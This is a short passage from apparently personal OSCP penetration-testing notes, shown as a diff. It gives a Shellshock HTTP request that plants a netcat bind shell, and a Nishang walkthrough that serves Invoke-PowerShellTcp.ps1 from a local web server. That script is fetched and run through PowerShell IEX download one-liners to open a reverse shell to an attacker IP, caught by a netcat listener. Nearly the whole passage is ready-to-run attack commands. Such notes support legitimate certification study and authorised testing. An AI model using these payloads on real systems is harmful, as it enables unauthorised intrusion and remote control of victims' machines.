grandMa5ter/Cyber-Sec-Notes/offensive/OSCP Mother of All Notes.md

   - Shell Shock run bind shell

              echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80

+- Nishang
+      **For this to work, you should have an exploit that can run remote command execution**
+  - You can install nishang via `sudo apt-get install nishang` which installs all of the reverseshells within `/user/share/nishang/shells/` to be used for purpose of reverse shells.
+      `cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1`
+  - After copying the script to your local working folder, copy one of the suitable example lines in the rev.ps1 to the bottom of the file:
+      `Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 9001`
+  - Start a web server via python
+      `python3 -m http.server 80`
+  - And within your RCE, put this as:
+      `powershell.exe -command IEX( IWR http://10.10.14.19:80/rev.ps1 -UseBasicParsing)`
+      or
+      `powershell.exe -command IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/rev.ps1')`
+  - You have to remember to run the handler to catch the shell:
+      `nc -nvlp 9001`

 ## File Transfers